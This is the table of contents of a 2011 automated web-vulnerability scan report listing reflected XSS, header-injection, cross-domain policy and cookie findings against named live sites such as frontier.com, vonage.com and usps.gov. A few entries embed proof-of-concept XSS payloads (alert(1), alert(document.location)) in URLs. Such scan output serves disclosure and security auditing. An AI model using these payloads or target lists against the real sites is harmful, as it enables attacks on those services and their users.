XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09062011-01

Report generated by XSS.Cx at Tue Sep 06 11:57:40 GMT-06:00 2011.


Contents

1. HTTP header injection

1.1. http://40.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

1.2. http://40.xg4ken.com/media/redir.php [url[] parameter]

1.3. http://pixel.everesttech.net/2565/c [url parameter]

1.4. http://redirect.rtrk.com/redirect [RL_ckstr parameter]

1.5. http://redirect.rtrk.com/redirect [RL_qstr parameter]

1.6. http://redirect.rtrk.com/redirect [RL_rurl parameter]

1.7. http://udmserve.net/udm/img.fetch [dt cookie]

1.8. http://utdi.reachlocal.net/images/Bottom_facebook.jpg [REST URL parameter 1]

1.9. http://utdi.reachlocal.net/images/Rsidepanel_CSportalHead.jpg [REST URL parameter 1]

1.10. http://utdi.reachlocal.net/images/Rsidepanel_ID-contact.jpg [REST URL parameter 1]

1.11. http://utdi.reachlocal.net/images/Rsidepanel_ID-pr.jpg [REST URL parameter 1]

1.12. http://utdi.reachlocal.net/images/Rsidepanel_ID-specials.jpg [REST URL parameter 1]

1.13. http://utdi.reachlocal.net/images/Rsidepanel_UTDI-G.jpg [REST URL parameter 1]

1.14. http://utdi.reachlocal.net/images/Rsidepanel_UTDiStore.jpg [REST URL parameter 1]

1.15. http://utdi.reachlocal.net/images/Rsidepanel_btm.jpg [REST URL parameter 1]

1.16. http://utdi.reachlocal.net/images/Rsidepanel_mid-specials.jpg [REST URL parameter 1]

1.17. http://utdi.reachlocal.net/images/Rsidepanel_mid.jpg [REST URL parameter 1]

1.18. http://utdi.reachlocal.net/images/back-front.jpg [REST URL parameter 1]

1.19. http://utdi.reachlocal.net/images/banr_techcorner.jpg [REST URL parameter 1]

1.20. http://utdi.reachlocal.net/images/box-1.jpg [REST URL parameter 1]

1.21. http://utdi.reachlocal.net/images/box-enews.jpg [REST URL parameter 1]

1.22. http://utdi.reachlocal.net/images/gpx_avaya_ip500sml.jpg [REST URL parameter 1]

1.23. http://utdi.reachlocal.net/images/icon_orangecheckball.gif [REST URL parameter 1]

1.24. http://utdi.reachlocal.net/images/logo-cisco-webex-main.gif [REST URL parameter 1]

1.25. http://utdi.reachlocal.net/images/logo_carousel.jpg [REST URL parameter 1]

1.26. http://utdi.reachlocal.net/images/logo_cisco_footer.jpg [REST URL parameter 1]

1.27. http://utdi.reachlocal.net/images/logo_nortel4.jpg [REST URL parameter 1]

1.28. http://utdi.reachlocal.net/images/mainhead_partners.jpg [REST URL parameter 1]

1.29. http://utdi.reachlocal.net/images/mainhead_smartbuys.jpg [REST URL parameter 1]

1.30. http://utdi.reachlocal.net/images/mainpic_blueguy.jpg [REST URL parameter 1]

1.31. http://utdi.reachlocal.net/images/mainpic_blueheadline.jpg [REST URL parameter 1]

1.32. http://utdi.reachlocal.net/images/navbutton_about-ovr.jpg [REST URL parameter 1]

1.33. http://utdi.reachlocal.net/images/navbutton_about.jpg [REST URL parameter 1]

1.34. http://utdi.reachlocal.net/images/navbutton_client-ovr.jpg [REST URL parameter 1]

1.35. http://utdi.reachlocal.net/images/navbutton_client.jpg [REST URL parameter 1]

1.36. http://utdi.reachlocal.net/images/navbutton_contact-ovr.jpg [REST URL parameter 1]

1.37. http://utdi.reachlocal.net/images/navbutton_contact.jpg [REST URL parameter 1]

1.38. http://utdi.reachlocal.net/images/navbutton_products-ovr.jpg [REST URL parameter 1]

1.39. http://utdi.reachlocal.net/images/navbutton_products.jpg [REST URL parameter 1]

1.40. http://utdi.reachlocal.net/images/navbutton_projects-ovr.jpg [REST URL parameter 1]

1.41. http://utdi.reachlocal.net/images/navbutton_projects.jpg [REST URL parameter 1]

1.42. http://utdi.reachlocal.net/images/navbutton_services-ovr.jpg [REST URL parameter 1]

1.43. http://utdi.reachlocal.net/images/navbutton_services.jpg [REST URL parameter 1]

1.44. http://utdi.reachlocal.net/images/partner-logos-avaya.jpg [REST URL parameter 1]

1.45. http://utdi.reachlocal.net/images/partner-logos-sonexis.jpg [REST URL parameter 1]

1.46. http://utdi.reachlocal.net/images/productpic_avaya1.jpg [REST URL parameter 1]

1.47. http://utdi.reachlocal.net/images/spacer.gif [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://ad.agkn.com/iframe!t=1129! [clk1 parameter]

2.2. http://ad.agkn.com/iframe!t=1129! [mt_adid parameter]

2.3. http://ad.agkn.com/iframe!t=1129! [mt_id parameter]

2.4. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]

2.5. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]

2.6. http://ad.agkn.com/iframe!t=1129! [redirect parameter]

2.7. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]

2.8. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]

2.9. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]

2.10. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

2.11. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

2.12. http://ad.agkn.com/iframe!t=1131! [redirect parameter]

2.13. http://ads.media.net/medianet.php [size parameter]

2.14. http://ads.pointroll.com/PortalServe/ [r parameter]

2.15. http://ads.pointroll.com/PortalServe/ [redir parameter]

2.16. http://ads.pointroll.com/PortalServe/ [time parameter]

2.17. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]

2.18. http://adserver.teracent.net/tase/ad [rcu parameter]

2.19. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 2]

2.20. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 3]

2.21. http://comcast-www.baynote.net/baynote/tags3/guide/results-xsl/comcast-www [elementIds parameter]

2.22. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard [mbox parameter]

2.23. http://event.adxpose.com/event.flow [uid parameter]

2.24. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]

2.25. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]

2.26. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]

2.27. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 1]

2.28. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 2]

2.29. http://frontier.com/BillPay/Login.aspx [REST URL parameter 1]

2.30. http://frontier.com/BillPay/Login.aspx [REST URL parameter 2]

2.31. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]

2.32. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

2.33. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

2.34. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 1]

2.35. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 2]

2.36. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 3]

2.37. http://frontier.com/Images/2011promo/bg-grey.jpg [name of an arbitrarily supplied request parameter]

2.38. http://frontier.com/Shop/Login.aspx [REST URL parameter 1]

2.39. http://frontier.com/Shop/Login.aspx [REST URL parameter 2]

2.40. http://frontier.com/winwin1 [REST URL parameter 1]

2.41. http://frontier.com/winwin1 [mkwid parameter]

2.42. http://frontier.com/winwin1 [name of an arbitrarily supplied request parameter]

2.43. http://frontier.com/winwin1 [pcrid parameter]

2.44. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx [lc parameter]

2.45. http://ib.adnxs.com/seg [redir parameter]

2.46. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpck parameter]

2.47. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpvc parameter]

2.48. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]

2.49. http://postcalc.usps.gov/CombineScriptsHandler.ashx [_TSM_HiddenField_ parameter]

2.50. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]

2.51. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

2.52. http://show.partners-z.com/s/show [name of an arbitrarily supplied request parameter]

2.53. http://utdi.reachlocal.com/coupon/ [cid parameter]

2.54. http://utdi.reachlocal.com/coupon/ [dynamic_proxy parameter]

2.55. http://utdi.reachlocal.com/coupon/ [kw parameter]

2.56. http://utdi.reachlocal.com/coupon/ [name of an arbitrarily supplied request parameter]

2.57. http://utdi.reachlocal.com/coupon/ [primary_serv parameter]

2.58. http://utdi.reachlocal.com/coupon/ [pub_cr_id parameter]

2.59. http://utdi.reachlocal.com/coupon/ [rl_key parameter]

2.60. http://utdi.reachlocal.com/coupon/ [scid parameter]

2.61. http://utdi.reachlocal.com/coupon/ [se_refer parameter]

2.62. http://utdi.reachlocal.com/coupon/ [tc parameter]

2.63. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [cid parameter]

2.64. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [dynamic_proxy parameter]

2.65. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [kw parameter]

2.66. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [name of an arbitrarily supplied request parameter]

2.67. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [primary_serv parameter]

2.68. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [pub_cr_id parameter]

2.69. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_key parameter]

2.70. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_track_landing_pages parameter]

2.71. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [scid parameter]

2.72. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [se_refer parameter]

2.73. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [tc parameter]

2.74. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]

2.75. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]

2.76. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]

2.77. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [REST URL parameter 1]

2.78. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]

2.79. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [REST URL parameter 1]

2.80. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]

2.81. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]

2.82. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

2.83. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

2.84. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 1]

2.85. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 2]

2.86. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 3]

2.87. http://www.frontier.com/Images/Common/form_bg.gif [name of an arbitrarily supplied request parameter]

2.88. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 1]

2.89. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 2]

2.90. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 1]

2.91. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 2]

2.92. https://www.frontier.com/AgentOrdering/Login/ [name of an arbitrarily supplied request parameter]

2.93. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 1]

2.94. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 2]

2.95. https://www.frontier.com/BillPay/Login.aspx [REST URL parameter 1]

2.96. https://www.frontier.com/BillPay/Login.aspx [name of an arbitrarily supplied request parameter]

2.97. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

2.98. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

2.99. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]

2.100. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]

2.101. https://www.frontier.com/Shop/Login.aspx [name of an arbitrarily supplied request parameter]

2.102. http://www.myfitv.com/search [query parameter]

2.103. http://www.vonage.com/search.php [lang_cntry parameter]

2.104. http://www.vonage.com/search.php [name of an arbitrarily supplied request parameter]

2.105. http://www.vonage.com/search.php [q parameter]

2.106. http://www.vonage.com/search.php [q parameter]

2.107. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

2.108. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

2.109. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

2.110. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

2.111. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

2.112. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

2.113. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

2.114. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

2.115. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

2.116. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

2.117. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

2.118. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

2.119. http://yp.frontierpages.com/results.aspx [term parameter]

2.120. http://zip4.usps.com/zip4/zcl_1_results.jsp [state parameter]

2.121. http://sitesearch.comcast.com/ [Referer HTTP header]

2.122. http://www.whitefence.com/category/high-speed-internet/ [Referer HTTP header]

2.123. http://www.whitefence.com/category/home-phone/ [Referer HTTP header]

2.124. http://www.whitefence.com/category/television-service/ [Referer HTTP header]

2.125. http://frontier.my.yahoo.com/ [B cookie]

2.126. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js [ruid cookie]

2.127. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js [ruid cookie]

2.128. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js [ruid cookie]

2.129. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js [ruid cookie]

2.130. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

2.131. http://utdi.reachlocal.net/index.html [RlocalUID cookie]

2.132. http://www.frontierpages.com/ [FrontierPages cookie]

2.133. http://www.frontierpages.com/ [FrontierPages cookie]

2.134. http://www.frontierpages.com/region.asp [FrontierPages cookie]

2.135. http://www.frontierpages.com/region.asp [FrontierPages cookie]

3. Flash cross-domain policy

3.1. http://40.xg4ken.com/crossdomain.xml

3.2. http://ad.agkn.com/crossdomain.xml

3.3. http://ad.turn.com/crossdomain.xml

3.4. http://admin.brightcove.com/crossdomain.xml

3.5. http://ads.media.net/crossdomain.xml

3.6. http://ads.pointroll.com/crossdomain.xml

3.7. http://ads.yimg.com/crossdomain.xml

3.8. http://ads.yldmgrimg.net/crossdomain.xml

3.9. http://adserver.teracent.net/crossdomain.xml

3.10. http://altfarm.mediaplex.com/crossdomain.xml

3.11. http://api.facebook.com/crossdomain.xml

3.12. http://as.casalemedia.com/crossdomain.xml

3.13. http://as1.suitesmart.com/crossdomain.xml

3.14. http://b.scorecardresearch.com/crossdomain.xml

3.15. http://by.optimost.com/crossdomain.xml

3.16. http://cdn.turn.com/crossdomain.xml

3.17. http://cimage.adobe.com/crossdomain.xml

3.18. http://citizenstelecom.112.2o7.net/crossdomain.xml

3.19. http://comcastresidentialservices.tt.omtrdc.net/crossdomain.xml

3.20. http://cr0.worthathousandwords.com/crossdomain.xml

3.21. http://d.yimg.com/crossdomain.xml

3.22. http://e.yimg.com/crossdomain.xml

3.23. http://ec.atdmt.com/crossdomain.xml

3.24. http://ehg-verizon.hitbox.com/crossdomain.xml

3.25. http://event.adxpose.com/crossdomain.xml

3.26. http://event.rtrk.com/crossdomain.xml

3.27. http://external.ak.fbcdn.net/crossdomain.xml

3.28. http://g-pixel.invitemedia.com/crossdomain.xml

3.29. http://iar.worthathousandwords.com/crossdomain.xml

3.30. http://ib.adnxs.com/crossdomain.xml

3.31. http://img.mediaplex.com/crossdomain.xml

3.32. http://int.teracent.net/crossdomain.xml

3.33. http://integrate.112.2o7.net/crossdomain.xml

3.34. http://l.yimg.com/crossdomain.xml

3.35. http://landing.optionshouse.com/crossdomain.xml

3.36. http://log30.doubleverify.com/crossdomain.xml

3.37. http://metrics.scottrade.com/crossdomain.xml

3.38. http://metrics.vonage.com/crossdomain.xml

3.39. http://pixel.everesttech.net/crossdomain.xml

3.40. http://pixel.fetchback.com/crossdomain.xml

3.41. http://pixel.invitemedia.com/crossdomain.xml

3.42. http://pixel.quantserve.com/crossdomain.xml

3.43. http://presence.apizone.betaregion.oberon-media.com/crossdomain.xml

3.44. http://query.yahooapis.com/crossdomain.xml

3.45. http://r.casalemedia.com/crossdomain.xml

3.46. http://redirect.rtrk.com/crossdomain.xml

3.47. http://s0.2mdn.net/crossdomain.xml

3.48. http://segment-pixel.invitemedia.com/crossdomain.xml

3.49. http://sensor2.suitesmart.com/crossdomain.xml

3.50. http://serviceo.comcast.net/crossdomain.xml

3.51. http://spe.atdmt.com/crossdomain.xml

3.52. http://speed.pointroll.com/crossdomain.xml

3.53. http://t.invitemedia.com/crossdomain.xml

3.54. http://t.pointroll.com/crossdomain.xml

3.55. http://tags.bluekai.com/crossdomain.xml

3.56. http://utdi.reachlocal.com/crossdomain.xml

3.57. http://utdi.reachlocal.net/crossdomain.xml

3.58. http://whitefence.112.2o7.net/crossdomain.xml

3.59. http://www.burstnet.com/crossdomain.xml

3.60. http://www.myfitv.com/crossdomain.xml

3.61. http://www.zillow.com/crossdomain.xml

3.62. http://www2.whitefence.com/crossdomain.xml

3.63. http://yql.yahooapis.com/crossdomain.xml

3.64. http://a.adready.com/crossdomain.xml

3.65. http://ads.bridgetrack.com/crossdomain.xml

3.66. http://espanol.vonage.com/crossdomain.xml

3.67. http://finance.yahoo.com/crossdomain.xml

3.68. http://frontier.my.yahoo.com/crossdomain.xml

3.69. http://geo.yahoo.com/crossdomain.xml

3.70. http://gws.maps.yahoo.com/crossdomain.xml

3.71. http://maps.yahoo.com/crossdomain.xml

3.72. http://media.sonypictures.com/crossdomain.xml

3.73. http://mi.adinterax.com/crossdomain.xml

3.74. http://movies.yahoo.com/crossdomain.xml

3.75. http://music.yahoo.com/crossdomain.xml

3.76. http://new.music.yahoo.com/crossdomain.xml

3.77. http://omg.yahoo.com/crossdomain.xml

3.78. http://optimized-by.rubiconproject.com/crossdomain.xml

3.79. http://pagead2.googlesyndication.com/crossdomain.xml

3.80. http://realestate.yahoo.com/crossdomain.xml

3.81. http://scottrade.wsod.com/crossdomain.xml

3.82. http://search.yahoo.com/crossdomain.xml

3.83. http://shopping.yahoo.com/crossdomain.xml

3.84. http://sports.yahoo.com/crossdomain.xml

3.85. http://static.ak.fbcdn.net/crossdomain.xml

3.86. https://us.etrade.com/crossdomain.xml

3.87. http://video.music.yahoo.com/crossdomain.xml

3.88. http://www.comcast.net/crossdomain.xml

3.89. http://www.facebook.com/crossdomain.xml

3.90. http://www.fidelity.com/crossdomain.xml

3.91. https://www.fidelity.com/crossdomain.xml

3.92. http://www.pgatour.com/crossdomain.xml

3.93. http://xfinity.comcast.net/crossdomain.xml

3.94. http://www.vonage.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ads.pointroll.com/clientaccesspolicy.xml

4.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.3. http://citizenstelecom.112.2o7.net/clientaccesspolicy.xml

4.4. http://ec.atdmt.com/clientaccesspolicy.xml

4.5. http://integrate.112.2o7.net/clientaccesspolicy.xml

4.6. http://metrics.scottrade.com/clientaccesspolicy.xml

4.7. http://metrics.vonage.com/clientaccesspolicy.xml

4.8. http://pixel.quantserve.com/clientaccesspolicy.xml

4.9. http://s0.2mdn.net/clientaccesspolicy.xml

4.10. http://serviceo.comcast.net/clientaccesspolicy.xml

4.11. http://spe.atdmt.com/clientaccesspolicy.xml

4.12. http://speed.pointroll.com/clientaccesspolicy.xml

4.13. http://whitefence.112.2o7.net/clientaccesspolicy.xml

4.14. http://www.fidelity.com/clientaccesspolicy.xml

4.15. https://www.fidelity.com/clientaccesspolicy.xml

5. SSL cookie without secure flag set

5.1. https://go.ooma.com/activate

5.2. https://go.ooma.com/activate/activation_code

5.3. https://www.fidelity.com/welcome/200-free-trades

5.4. https://www.comcast.com/Localization/Localize.cspx

5.5. https://www.comcast.com/includes/js/IDGenerator.ashx

6. Session token in URL

6.1. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard

6.2. https://login.comcast.net/myaccount/lookup

6.3. http://omg.yahoo.com/

6.4. http://omg.yahoo.com/xhr/ad/LREC/2115806991

6.5. http://www.facebook.com/extern/login_status.php

6.6. http://www.websitealive9.com/2140/visitor/vTrackerSrc_v2.asp

7. SSL certificate

7.1. https://login.yahoo.com/

7.2. https://www.comcastsupport.com/

7.3. https://www.frontier.com/

7.4. https://customer.comcast.com/

7.5. https://go.ooma.com/

7.6. https://login.aptela.com/

7.7. https://login.comcast.net/

7.8. https://login.frontier.com/

7.9. https://login.frontiermobile.com/

7.10. https://us.etrade.com/

7.11. https://www.comcast.com/

7.12. https://www.fidelity.com/

7.13. https://www.frontiermobile.com/

7.14. https://www.optionshouse.com/

7.15. https://www.usps.com/

8. Password field submitted using GET method

9. Cookie scoped to parent domain

9.1. http://pixel.everesttech.net/2565/c

9.2. http://pixel.everesttech.net/2565/i

9.3. http://40.xg4ken.com/media/redir.php

9.4. http://ad.agkn.com/iframe!t=1129!

9.5. http://ad.agkn.com/iframe!t=1131!

9.6. http://ads.lucidmedia.com/clicksense/pixel

9.7. http://ads.pointroll.com/PortalServe/

9.8. http://adserver.teracent.net/tase/ad

9.9. http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

9.10. http://ak1.abmr.net/is/www.burstnet.com

9.11. http://b.scorecardresearch.com/b

9.12. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1

9.13. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

9.14. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

9.15. http://ehg-verizon.hitbox.com/HG

9.16. http://espanol.vonage.com/mpel.js

9.17. http://external.dmtracker.com/tags/vs.js

9.18. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

9.19. http://forums.comcast.com/t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message

9.20. http://forums.comcast.com/t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36

9.21. http://frontier.my.yahoo.com/

9.22. http://frontier.my.yahoo.com/e/js

9.23. http://gdyn.pgatour.com/1.1/1.gif

9.24. http://ib.adnxs.com/seg

9.25. http://id.google.com/verify/EAAAAAcJfsVcWEi1PTv691pGpQk.gif

9.26. http://int.teracent.net/tase/int

9.27. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

9.28. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js

9.29. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js

9.30. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js

9.31. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js

9.32. http://optimized-by.rubiconproject.com/a/dk.js

9.33. http://pixel.fetchback.com/serve/fb/pdc

9.34. http://pixel.quantserve.com/api/segments.json

9.35. http://pixel.quantserve.com/pixel

9.36. http://r1-ads.ace.advertising.com/site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

9.37. http://r1-ads.ace.advertising.com/site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

9.38. http://redirect.rtrk.com/redirect

9.39. http://sales.liveperson.net/hc/21807557/

9.40. http://sensor2.suitesmart.com/sensor4.js

9.41. http://testdm.travelers.com/trvwics.gif

9.42. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif

9.43. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif

9.44. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif

9.45. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif

9.46. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif

9.47. http://tr.adinterax.com/re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif

9.48. http://utdi.reachlocal.com/

9.49. http://utdi.reachlocal.net/index.html

9.50. http://www.burstnet.com/enlightn/8117/3E06/

9.51. https://www.comcast.com/Localization/Localize.cspx

9.52. http://www.zillow.com/app

10. Cookie without HttpOnly flag set

10.1. http://ads.adxpose.com/ads/ads.js

10.2. http://event.adxpose.com/event.flow

10.3. http://pixel.everesttech.net/2565/c

10.4. http://pixel.everesttech.net/2565/i

10.5. http://sales.liveperson.net/visitor/addons/deploy.asp

10.6. https://www.fidelity.com/welcome/200-free-trades

10.7. http://www.frontierhelp.com/

10.8. http://www.whitefence.com/a

10.9. http://40.xg4ken.com/media/redir.php

10.10. http://ad.agkn.com/iframe!t=1129!

10.11. http://ad.agkn.com/iframe!t=1131!

10.12. http://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**

10.13. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**

10.14. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

10.15. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

10.16. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

10.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

10.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

10.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/474.207.tk.TEXT/1315313093322187

10.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/675.22.tk.120x301315313093322187

10.21. http://ad.yieldmanager.com/iframe3

10.22. http://ad.yieldmanager.com/iframe3

10.23. http://ad.yieldmanager.com/iframe3

10.24. http://ad.yieldmanager.com/imp

10.25. http://ad.yieldmanager.com/imp

10.26. http://ad.yieldmanager.com/imp

10.27. http://ad.yieldmanager.com/pixel

10.28. http://ads.bridgetrack.com/site/rtgt.asp

10.29. http://ads.lucidmedia.com/clicksense/pixel

10.30. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

